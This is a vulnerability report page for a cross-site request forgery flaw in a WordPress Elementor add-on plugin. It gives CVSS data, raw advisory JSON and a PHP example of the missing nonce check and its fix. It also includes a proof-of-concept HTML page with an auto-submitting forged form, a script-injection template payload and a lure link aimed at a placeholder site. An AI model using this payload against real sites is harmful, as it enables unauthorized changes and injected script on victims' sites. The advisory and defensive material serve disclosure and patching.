Security Vulnerability Report
CVE-2025-14163 CVSS 4.3 MEDIUM

CVE-2025-14163

Published: 2025-12-23 10:15:43
Last Modified: 2026-04-08 18:24:08

Description

The Premium Addons for Elementor plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.11.53. This is due to missing nonce validation in the 'insert_inner_template' function. This makes it possible for unauthenticated attackers to create arbitrary Elementor templates via a forged request granted they can trick a site administrator or other user with the edit_posts capability into performing an action such as clicking on a link.
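As an added illustration of the CWE-352 pattern the description refers to (not the plugin's own code: the hook name, nonce action string and callback bodies are assumptions), here is an admin-ajax.php handler without a nonce check beside the hardened form that ties the request to a server-issued nonce and a capability check:

```php
<?php
// Added illustration of the missing-nonce pattern behind CVE-2025-14163.
// NOT the plugin's code: hook name, nonce action and bodies are assumptions.

// BEFORE (vulnerable): any request carrying the victim's login cookies is
// accepted, so a cross-site form that auto-submits to admin-ajax.php succeeds.
function pa_demo_insert_inner_template_vulnerable() {
    $title = sanitize_text_field( wp_unslash( $_POST['template_name'] ?? '' ) );
    $id    = wp_insert_post( array(
        'post_type'   => 'elementor_library', // Elementor's template post type
        'post_title'  => $title,
        'post_status' => 'publish',
    ) );
    wp_send_json_success( array( 'id' => $id ) );
}

// AFTER (fixed): the request must carry a nonce WordPress issued to this user
// for this action, and the user must hold the capability for the operation.
function pa_demo_insert_inner_template_fixed() {
    // Terminates the request (wp_die with -1) when the 'nonce' field is
    // missing, expired, or minted for another user or action. A page on an
    // attacker's origin cannot read the nonce, so it cannot forge the request.
    check_ajax_referer( 'pa_demo_insert_inner_template', 'nonce' );

    // A nonce proves intent, not authority: still enforce the capability.
    if ( ! current_user_can( 'edit_posts' ) ) {
        wp_send_json_error( 'insufficient permissions', 403 );
    }

    $title = sanitize_text_field( wp_unslash( $_POST['template_name'] ?? '' ) );
    $id    = wp_insert_post( array(
        'post_type'   => 'elementor_library',
        'post_title'  => $title,
        'post_status' => 'publish',
    ) );
    wp_send_json_success( array( 'id' => $id ) );
}
// Only the fixed callback is registered in this illustration.
add_action( 'wp_ajax_pa_demo_insert_inner_template', 'pa_demo_insert_inner_template_fixed' );

// The legitimate editor page receives the nonce server-side and sends it in
// the 'nonce' POST field; third-party pages never see this value.
function pa_demo_enqueue_editor_script() {
    wp_enqueue_script( 'pa-demo-editor', plugins_url( 'editor.js', __FILE__ ), array( 'jquery' ), '1.0', true );
    wp_localize_script( 'pa-demo-editor', 'paDemo', array(
        'ajaxUrl' => admin_url( 'admin-ajax.php' ),
        'nonce'   => wp_create_nonce( 'pa_demo_insert_inner_template' ),
    ) );
}
add_action( 'admin_enqueue_scripts', 'pa_demo_enqueue_editor_script' );
```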

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:leap13:premium_addons_for_elementor:*:*:*:*:*:wordpress:*:* - VULNERABLE
Premium Addons for Elementor <= 4.11.53 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CSRF PoC for CVE-2025-14163 -->
<!-- Exploits missing nonce validation in insert_inner_template function -->
<!DOCTYPE html>
<html>
<head>
  <title>CSRF Attack - Create Elementor Template</title>
</head>
<body>
  <h1>CSRF PoC for CVE-2025-14163</h1>
  <p>Click the button below to trigger template creation (requires admin interaction)</p>
  <!-- Auto-submit form -->
  <form id="csrfForm" action="https://target-site.com/wp-admin/admin-ajax.php" method="POST">
    <input type="hidden" name="action" value="premium_addons_insert_inner_template">
    <input type="hidden" name="template_name" value="Malicious Template">
    <input type="hidden" name="template_content" value="<script>alert('XSS')</script>">
    <input type="hidden" name="template_type" value="section">
  </form>
  <script>
    // Auto-submit after page load
    document.getElementById('csrfForm').submit();
  </script>
  <p>Or use this link (social engineering):</p>
  <a href="https://target-site.com/wp-admin/admin-ajax.php?action=premium_addons_insert_inner_template&template_name=Malicious&template_content=<script>alert('XSS')</script>">Click for free gift!</a>
</body>
</html>

References

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-14163",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-23T10:15:43.497",
    "lastModified": "2026-04-08T18:24:08.443",
    "vulnStatus": "Modified",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Premium Addons for Elementor plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.11.53. This is due to missing nonce validation in the 'insert_inner_template' function. This makes it possible for unauthenticated attackers to create arbitrary Elementor templates via a forged request granted they can trick a site administrator or other user with the edit_posts capability into performing an action such as clicking on a link."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          { "lang": "en", "value": "CWE-352" }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:leap13:premium_addons_for_elementor:*:*:*:*:*:wordpress:*:*",
                "versionEndExcluding": "4.11.54",
                "matchCriteriaId": "64CFC13B-0B7D-4AAA-946C-74E74ED44158"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/premium-addons-for-elementor/tags/4.11.53/includes/templates/classes/manager.php#L246",
        "source": "[email protected]",
        "tags": ["Product"]
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/premium-addons-for-elementor/tags/4.11.53/includes/templates/classes/manager.php#L40",
        "source": "[email protected]",
        "tags": ["Product"]
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset/3416254/",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://research.cleantalk.org/cve-2025-14163/",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/77b57f2a-0b46-4b4a-bdca-1c5218d739ce?source=cve",
        "source": "[email protected]",
        "tags": ["Third Party Advisory"]
      }
    ]
  }
}